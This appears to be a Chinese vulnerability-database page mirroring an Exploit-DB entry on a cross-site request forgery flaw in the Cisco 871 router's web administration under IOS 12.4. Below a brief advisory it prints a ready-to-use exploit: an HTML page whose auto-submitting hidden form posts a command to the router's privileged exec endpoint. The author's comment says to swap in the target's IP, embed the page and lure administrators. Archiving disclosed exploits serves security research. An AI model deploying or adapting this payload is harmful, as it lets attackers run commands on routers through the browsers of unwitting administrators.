Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056853 漏洞类型
发布时间 2008-09-17 更新时间 2008-09-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32390
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31218/info

The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.

Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.

The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. 

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="asdf.submit();"> <form name=asdf method="post" action="http://example.com/level/15/exec/-"> <input type=hidden name=command value="show privilege"> <input type=hidden name=command_url value="/level/15/exec/-"> </body> </html>